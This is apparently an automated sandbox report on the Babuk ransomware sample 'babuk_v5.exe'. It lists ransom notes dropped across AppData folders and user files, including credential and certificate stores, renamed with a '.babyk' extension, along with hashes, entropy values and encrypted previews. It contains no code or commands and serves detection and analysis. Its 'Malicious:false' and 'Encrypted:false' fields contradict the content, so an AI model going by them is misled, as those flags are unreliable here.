                                                                            C:\Users\user\AppData\Roaming\Microsoft\MMC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.636153360637957
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlwRjlaKoQiib7JWvNU6+zIHKAWHUMZ31AIISmlvFEGwKXllO9UxNvEEn:AFlaKkib7+5+cHCb31XRGvFqK1lO90vt
                                                                            MD5:9C5BB3EB98AB043F2F2E0E7E5CB8C71C
                                                                            SHA1:78A95CFCD0B2DBF6A451326C1583D2FA45D6FE7B
                                                                            SHA-256:6C0E8F272C86BCCCF08BE1B77E97F27C056B8210500DDCD9A1D45303FABE6E9C
                                                                            SHA-512:13137292E02D4B59765494E8C86349D642A67DB3C254023B52BE3C030DDFFE89A4BE177303F4631895B7B3E729B4F0482969816D71F239C6FE072DFECCDCBE74
                                                                            Malicious:false
                                                                            Preview: .....`.F|>.......E.(+(.G...)...o...8r....~....*.._..6.5ks..b/e.`.M..KZ...o.1{I..{.....0...}A,....Hy1.?zn_...;......t...@..h2....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):480
                                                                            Entropy (8bit):7.494683228428951
                                                                            Encrypted:false
                                                                            SSDEEP:12:MKR3sHcVHybFD/N5SOxGU4qoeBhgfn4/rYM4aZ:MKRWcVHybFrNF4iBhgQ8K
                                                                            MD5:627B708265AA024FCEECEEAAFC8C068D
                                                                            SHA1:66D16AFC62BD2D4584392626CC107F509673B5D8
                                                                            SHA-256:D5CB780EE4385CF2DFD4176E2E81313A80EA0C68A6EC67E806B62C0AF9CD36CE
                                                                            SHA-512:5C3A6CFB912498D5F479546393F9EFF9820CBABC81627A38EFCF485B5EBD101FF0E3C818EB99FBB62EA51E08FF1FCD866D42905891E162EDC15C4DBDA7E161D4
                                                                            Malicious:false
                                                                            Preview: ...4<.1...6.N?w.,$..s.z..i....QB.N..l.Kqb..Q.c2B1.J.o......0....o.^.&9{C}.3"........El.Y#........i{.....wm...Q1.Z.....Y..M...G."...Ln.RU..BL.....V?..|.z*....P.%Do..+.........r....GA ?(.......\[n..Z...C......g/.q|...S..o..<..)...j.*]!}..=... Z...O.HW.....K.`v........3.u.N..Sw..#jn&.t?F.N3..D..4..{.....KU^Z...n...A......0.l&u$...6.p......S....+...0.n3...C....H|..Ap..H..<JGai..}t.4...R.Y .e..4.7.00...t.......-.j.A.....a......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\0e0e67a2-dcf2-484a-95b2-8e3e695898c0.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):636
                                                                            Entropy (8bit):7.681792599956301
                                                                            Encrypted:false
                                                                            SSDEEP:12:Tb06au1SPnBjZUK3h4d/QRzQIw1jSO1KxyeFtb0IAM1RJ:TRh0Pvf1RzQI0jSOoxyeLbMM1RJ
                                                                            MD5:028740CB10DF186C7D890412A4BF59F0
                                                                            SHA1:CA111F43D620134C5433E8BF508AD09C6720991C
                                                                            SHA-256:ED181C84EF09259DF67B9055908E6BB121CE2CF0705339A81C78FCE6BE762320
                                                                            SHA-512:A315F6E432AA40D918B3D9C9F16F37A4A36FC5BD26153036540F5CA9A33EA32F5479EEEBEFBB0203C160F717A84F332B1B4699667A7B313529BF94413CD51050
                                                                            Malicious:false
                                                                            Preview: .S.....7..5q.Z......=...Y..-.h7u....?4[....@..z.._"ma....?x........nC...&:-..,....PN..>...mn..Y.&`.N..L..#po.Au.l.<.J..s..R..z..u...E.m7.........Nr...N....W8bF......La'*...<....0..5....|..i?..o_\...H#~I....E.w........p3.....@n.....4...1..|.;.{q.z..J.G.3I..E8.~".!..(.?ih.......86...9"i.L&..,.PLA:...CT9.OG....h-.u..L...D;.6........Q...r.........[K..b.[.....)-..E.wA..DV.3:\P"...l.d...k.<Fy....x......GT?._..,...P.....p..$.)B%..3..G.pu6...V....U..!........U....w..u..V......<K.........H....T.s~f../.....x....M.....~<.z.J...P.......za._`l."..b3......)..-.X..D.Z..|U%.[x....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\4f40f935-563c-4960-82bf-9e9889ebd721.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):636
                                                                            Entropy (8bit):7.646338514783773
                                                                            Encrypted:false
                                                                            SSDEEP:12:aaPf4dbfOJlyaDBXRyegTff/H5hVVWhjcXQTLs0rSOOreQYfWrl8R:aa34dbfOTyalXRyDfRVNXAA7redsA
                                                                            MD5:4B3DBCC2D087C4CDB7B2FCDBB3624CED
                                                                            SHA1:90A4206231EBD61FE0107AF07D835CFC0894B265
                                                                            SHA-256:1532B3A965C7D29300DC48DE671E3B86AB0196249B1ECEA1F28B2BC1A83F5BB6
                                                                            SHA-512:6A54889DA0F9F9FADB26C84065D70DDAD8E4C1C9B0347F19F22BE75429CB6ED8235643B295F28C16CB5D6CEF435D4BCC40BFE643430F6066140C78B6C45C8972
                                                                            Malicious:false
                                                                            Preview: .G%.J..%x....<.......t..1'^.Z.1.{D..>...=5......0.U.k...G.~.v.<L79.4.U"..:...P.Aw./...;.\&V.h..9.y..f ....hO.....q.jI.1...n+.w......h..q......G..cc..2.W=.>.W.H.Z.C....uk....&..~j.......}..i.....L&WuuRQ..]....0..~...a......u..s.OB#0...........DID........niY...O......4....8Nf..^...Cp..I...eXe!.q;`._...=w....Z..(9.7..&.S qLN.&.c........p..%?S...t.s....44..T..g...$.3..!J@.... kRk\.....&.;..%...(.YZ..b..._.7.Q...6.;...d...d.H...7.l?.0~. ....@.....4TYn...R..fx|..=y4=.-.....A...../..".....,.p...f]...].f.R..W_..*.T..9.y...`.P>k..'+.E.0G+D.I4........>Nm....S....)...@.v.9....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\Preferred.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):192
                                                                            Entropy (8bit):6.75986020684142
                                                                            Encrypted:false
                                                                            SSDEEP:3:MElvFlQwuN9Hx4nPwi2lz7kVdiUgdWnmQ6mS/TCGQPluW1CllmUxNvEEn:MElru3wGydQd4mQ6uGDl+0vtn
                                                                            MD5:BB22BCD4FC88E42C537314E6114AA234
                                                                            SHA1:B2EDB57CB63D3808540FE1236A67C998238C7654
                                                                            SHA-256:9C4011FB8321C76F2387AB7BE16000527290FF9CA22D6BC9E39358AF61BDEC17
                                                                            SHA-512:9FB8A79FE1753E93ED0B517794ABBA2C073B1E5B8E24897EE39C1DFC4D9C0F63595949ADFF21CFB07F662FBC340A9FA6615D279C2A7087A503C03ABA5DDF464C
                                                                            Malicious:false
                                                                            Preview: ......._...B....\.#.......=.I.....Ub...Iu...{...u....M3...z[.C...I8.+.i.`..I%.Ap.....~..N8w&..8.w{.C.Sq..Q..y_7..#"...AY....N?T%../.e.d@...l.(.P..Ii.t.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\de8c058c-b2d1-4c8c-8859-191fc05b8339.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):636
                                                                            Entropy (8bit):7.565733578685657
                                                                            Encrypted:false
                                                                            SSDEEP:12:p3RHoMPmNdAWmdSwyT3BmU3QH2lYP5Myzi5559I3RFH+v+V1LIZeD:p3R1WIy1mU3QWlgJza5rI3RkG1LIM
                                                                            MD5:3D81C9998CF7C2AEBD6965123810B2C9
                                                                            SHA1:64A8F56977C40E9D7DC74004DED104E7EB3CDDC9
                                                                            SHA-256:05B82A029FE8C400035B583A31028953DE1103B6D76F241F024DA9238841357B
                                                                            SHA-512:5867A8B12C3DC12F94F8E8AF807832DCDA5A8B61AEBA3174BD57A43B2DBA7AEC4CD548D2EDD0AD257EDC0BF309185AFD8D7A78C05CD5225D68FFA6E4C6E85012
                                                                            Malicious:false
                                                                            Preview: ..Z^..G[..H.V...91.P/..^....]....xbka.4z..xr..C...i.BS...Pn.d.....Vq...Gb..J....6O8~..p_....L..WZ..t1Eg........NWR.u..h.......Tt^..'6~x.. ..e..m._sp..J%...R...x...8.....a{.......D......S.E-X...AD..`.I(....Pz.3X.OB....nj..{m...9.UM:.V,^..O:o_...+#...#.bq.l..[......`..(K..#.P-.O.*..H..W#.dlG.B..=d...1...r....m{.}/.!o"i....L.;...?^:..v..Tk.%......{.s.Kt.#).Zg..~.0s....M.br}`..V.A>j.@.....U0....~..f.*;-.0...y.{.J.....l.w..n.P.KMK.J.U.8...).8.....p.2.\ DL..Q...).....O..U2j.J...ien. ..=2.!..#.XtL.<..c.....nP.!F..J....q..h.K.....'.{..+.. .W...T...6t..}L.A.{............choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\SYNCHIST.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):244
                                                                            Entropy (8bit):6.969431575627101
                                                                            Encrypted:false
                                                                            SSDEEP:6:oiosrq0dUed2x7Bcjt6sjHD0g+R6j933NfxACqg20vtn:oiLixtUvzj9HNfGdgZ
                                                                            MD5:99B88D05B47FBE30D821406164E4DAE0
                                                                            SHA1:F20C9A0A69A5F5F67405585CF413CE7AB59D1EC8
                                                                            SHA-256:E67AE34EE74FCF8900EAB3DF948B3FAD5F67FA53DB3B15B17194F4D6955C465B
                                                                            SHA-512:FFC64128FFDFE4B545A7AD3BCA98DFC92B5A3189A38576A2134CB6616D1DB85FC98912BEDE28E08C4D44200DD0F275A05A8C677651C594DDC5BFF46E7A8CFA9F
                                                                            Malicious:false
                                                                            Preview: 1s..<.....X...u.+8....O..|X..d!..........J.{.d.......J<u:.}...k...)yXz........[[..W.?.".^...8M/..x&..|...e....h.,.l...[wc<'..9..}."g&....R....)}..D.P..v.:.NEs.Rw..s...S.pJ.Qp...c...I.....+....-I.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Speech\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.acl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):6.55912424529072
                                                                            Encrypted:false
                                                                            SSDEEP:3:atulLs5RkwMRHRbiwjixcxdkQH5Z1zpCWN6LYShKKDNcnl+UxNvEEn:a8lK4H0jKxD1zBZShKKql+0vtn
                                                                            MD5:A5B6C6497DCD8460545351EDE9A67940
                                                                            SHA1:445CC70395A09A400154226B61ADE0DC97F5904D
                                                                            SHA-256:E7DD2F27567CA88DD7B876AB749CCEFEE7F9E38D74A78F26F610A3E58A4899E4
                                                                            SHA-512:0EF441BC5CAB1D80CF238DB238385CC63E06D7555B6EFF3CC6B83F74398F68D63E3A4F39497FCE8EE9DF1EE4352075B7A35E0A2CC815DB24F2D4478D0BC60C3B
                                                                            Malicious:false
                                                                            Preview: .8.....7.K.f\..2....m....@.#5x(N.....3..p......&.`.:..6...Q...2..k8.`.a?..@.^8do..k...Ab..\]..M.....-.D..-n...v}......f.<59h......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.dic.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):6.604132977375446
                                                                            Encrypted:false
                                                                            SSDEEP:3:ullpPivbKiLf+WD5k+kjVIeE9vzMvsYeNDa+pOU1DUDi9nWvKmUxNvEEn:u/4vuirpD0IeCgvSnEU1DU+FWSm0vtn
                                                                            MD5:31110B675C4005BBD9106404B465EB7B
                                                                            SHA1:3925C2506DEBEF08C323CEEAD880D61ED0069BF8
                                                                            SHA-256:5BF62B73E3E480F3A8875056FEC43B1B526CFEC431302B82E2481FEC7543892D
                                                                            SHA-512:D0AD2DC83A6A839BE35FC3B08C66535B7CC5801063129FF7471D2590A901B36BEBC57E5C0CF6D5DCD7AE839A815382868BC4D6F35BBA59E3AFE0DDB89933739B
                                                                            Malicious:false
                                                                            Preview: k$......74.....P....).s.BE.Z.c1.."0.........Vza#..=xY...`y.z..h..L.nb.R;....U.p..f.E..}9Ag..U..(.FCL.....*..;...M.q..K...f.......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.exc.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):6.673641486610488
                                                                            Encrypted:false
                                                                            SSDEEP:3:FTHP4GTn18C4bRmy49SJ32WFrUgK9rPodojj3oGEdB3LUxNvEEn:pH185VJ32C/KTgL0vtn
                                                                            MD5:DF3A344C3CD6AF7BFBE32B036AF769BB
                                                                            SHA1:593041B3B91B83F390F7003D138E98A8AB1E9E3D
                                                                            SHA-256:A2811301472E35F1B6055553FAD4989295E9D755662E4BE2966C4422A6D4698C
                                                                            SHA-512:1A5FF0D66CCC24244670F888E5F894A949BCEE982DE853C876E651E9786BA5E83CABE72CCDED9CE6FD7B611419EFAEC999B65484A4095F1936BB47BBB4320881
                                                                            Malicious:false
                                                                            Preview: * .....<.~&..|.*...a..O.j.Z....|.M.....@.x.W.g..7.C.4f.`A._.,.)C.J....\t.l...o.R.m.....K1....G.KIE..P..d7=rw.M3.m>L....~.!...........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.598614631551907
                                                                            Encrypted:false
                                                                            SSDEEP:3:tli6aS9tuVaS7vBAYYee8qenq0r1w+39jwkerH/owTcFmbltmUxNvEEn:yYuVh+YPnnN1L3iker1920vtn
                                                                            MD5:177644055FDE7E6866602EBA69398FCC
                                                                            SHA1:FE187D8C44560275A1A62B0DDC439B8E3A073029
                                                                            SHA-256:229954336EE2A992ADCE845E4FD71911245C0D61D46CA1F1208EB2B4ACC161D6
                                                                            SHA-512:AB6ECC70F9B8822FAD09694225BCA22E864DDD16604A7274B0CB1F50FA69A8777EA48370C974910D081B0EA802243FA33F0D0BD26F341A16070A6226453828EB
                                                                            Malicious:false
                                                                            Preview: ......_..cD.....>mJ...iB..p..~...^8.D..... b+.E.Y'...:..[.o.@.%,......dx.....I.x....m.-...P..&.mF.y.i.;N.+Q..%.....X9.{.{^..I.C.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
